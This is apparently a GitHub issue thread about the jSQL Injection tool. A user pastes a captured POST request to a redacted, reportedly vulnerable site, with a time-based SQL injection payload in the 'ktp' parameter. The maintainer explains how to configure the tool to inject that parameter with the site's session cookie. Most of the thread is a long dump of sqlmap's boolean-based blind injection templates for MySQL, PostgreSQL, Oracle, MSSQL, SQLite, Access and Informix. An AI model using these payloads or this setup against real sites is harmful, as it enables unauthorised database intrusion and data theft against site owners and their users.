can you make option parameter for support post request injection sql

[selectfromblackhydra]

post sql injection need parameter to test sql injection in post request because if not in my case sql injection not inject or false positive can you add subquery sql injection like sqlmap because in my case injection is vuln with subquery injection boolean blind thank you

[ron190]

• Sure, just deploy the advanced panel with the chevron on the right, then select radio for POST on the left:

• Can you be more specific with a error message or a detailed context ?

Strategy Blind should work too, you can debug logs in tab Network to track the issue. You can also share the sqlmap option tag you are using if you are refering to a specific tag.

[selectfromblackhydra]

i mean can you support post like this.

POST /forgot_action.php HTTP/1.1
Host: redacted
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=>
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl>
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=fqn1cf8c9aoompe9brgkqr8jn9
Origin: redacted
Upgrade-Insecure-Requests: 1
Referer: redacted.>
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="130",>
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 21

ktp=BoSUhm'%2b(select*from(select(sleep(20)))a)%2b'&nik=BoSUh>

[selectfromblackhydra]

this target is vuln but no waf but i have problem connection without correct parameter is ktp in sqlmap i dont now in jsql

[ron190]

I know people uses similar block template, so I'll see if it's possible to integrate it properly, though in jSQL your template is equivalent to what is on the screenshot:

• Set the <url>/forgot_action.php in address bar
• Select the POST radio
• ⚠ 👉 Copy/paste the request parameters but reverse it to nik=&ktp= to inject ktp, of check option Inject every Request params in Preference 👈 ⚠
• Copy/paste the block Host to Content-Length into header parameter, use the right button to open the modal

Also you may require a proper active session for Cookie: PHPSESSID=, depending on the service tested.

[selectfromblackhydra]

hey ron maybe you want learn sqlmap payload i have the file here This XML file does not appear to have any style information associated with it. The document tree is shown below.

<title>AND boolean-based blind - WHERE or HAVING clause</title> 1 1 1 1,8,9 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause</title> 1 1 3 1,9 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] OR [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title> 1 3 3 1,9 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] OR NOT [RANDNUM]=[RANDNUM1] <title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title> 1 2 1 1,8,9 1 AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) <title>OR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title> 1 2 3 1,9 2 OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) <title>AND boolean-based blind - WHERE or HAVING clause (comment)</title> 1 2 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] AND [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause (comment)</title> 1 2 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR [RANDNUM]=[RANDNUM1] <title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title> 1 4 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR NOT [RANDNUM]=[RANDNUM1] <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title> 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]

MySQL

<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title> 1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] # OR [RANDNUM]=[RANDNUM1]

MySQL

<title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title> 1 3 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] # OR NOT [RANDNUM]=[RANDNUM1]

MySQL

<title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title> 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] %16 AND [RANDNUM]=[RANDNUM1]

Microsoft Access

<title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title> 1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] %16 OR [RANDNUM]=[RANDNUM1]

Microsoft Access

<title>MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title> 1 2 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))

MySQL

<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title> 1 3 1 1,2,3,8 1 AND MAKE_SET([INFERENCE],[RANDNUM]) AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title> 1 3 3 1,2,3 2 OR MAKE_SET([INFERENCE],[RANDNUM]) OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title> 1 4 1 1,2,3,8 1 AND ELT([INFERENCE],[RANDNUM]) AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title> 1 4 3 1,2,3 2 OR ELT([INFERENCE],[RANDNUM]) OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title> 1 5 1 1,2,3,8 1 AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)

MySQL

<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title> 1 5 3 1,2,3,8 2 OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)

MySQL

<title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title> 1 2 1 1,8 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL

PostgreSQL

<title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title> 1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL

PostgreSQL

<title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title> 1 2 1 1 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL

Oracle

<title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title> 1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL

Oracle

<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title> 1 2 1 1 1 AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END

SQLite

<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title> 1 3 3 1 2 OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END

SQLite

<title>Boolean-based blind - Parameter replace (original value)</title> 1 1 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) <title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title> 1 4 1 1,2,3 3 MAKE_SET([INFERENCE],[RANDNUM]) MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

<title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title> 1 5 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])

MySQL

<title>MySQL boolean-based blind - Parameter replace (ELT)</title> 1 4 1 1,2,3 3 ELT([INFERENCE],[RANDNUM]) ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

<title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title> 1 5 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])

MySQL

<title>MySQL boolean-based blind - Parameter replace (bool*int)</title> 1 4 1 1,2,3 3 ([INFERENCE])*[RANDNUM] ([RANDNUM]=[RANDNUM])*[RANDNUM1] ([RANDNUM]=[RANDNUM1])*[RANDNUM1]

MySQL

<title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title> 1 5 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]

MySQL

<title>PostgreSQL boolean-based blind - Parameter replace</title> 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))

PostgreSQL

<title>PostgreSQL boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))

PostgreSQL

<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title> 1 5 1 1,2,3 3 (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title> 1 5 1 1,2,3 3 (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

<title>Oracle boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

<title>Oracle boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

<title>Informix boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)

Informix

<title>Informix boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)

Informix

<title>Microsoft Access boolean-based blind - Parameter replace</title> 1 3 1 1,3 3 IIF([INFERENCE],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)

Microsoft Access

<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title> 1 4 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)

Microsoft Access

<title>Boolean-based blind - Parameter replace (DUAL)</title> 1 2 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) <title>Boolean-based blind - Parameter replace (DUAL - original value)</title> 1 3 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) <title>Boolean-based blind - Parameter replace (CASE)</title> 1 2 1 1,3 3 (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) <title>Boolean-based blind - Parameter replace (CASE - original value)</title> 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) <title>MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title> 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))

MySQL >= 5.0

<title>MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))

MySQL >= 5.0

<title>MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title> 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))

MySQL < 5.0

<title>MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))

MySQL < 5.0

<title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title> 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))

PostgreSQL

<title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title> 1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))

PostgreSQL

<title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title> 1 5 1 3 1 ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title> 1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title> 1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

<title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title> 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

<title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

<title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title> 1 4 1 2,3 1 ,IIF([INFERENCE],1,1/0) ,IIF([RANDNUM]=[RANDNUM],1,1/0) ,IIF([RANDNUM]=[RANDNUM1],1,1/0)

Microsoft Access

<title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 5 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)

Microsoft Access

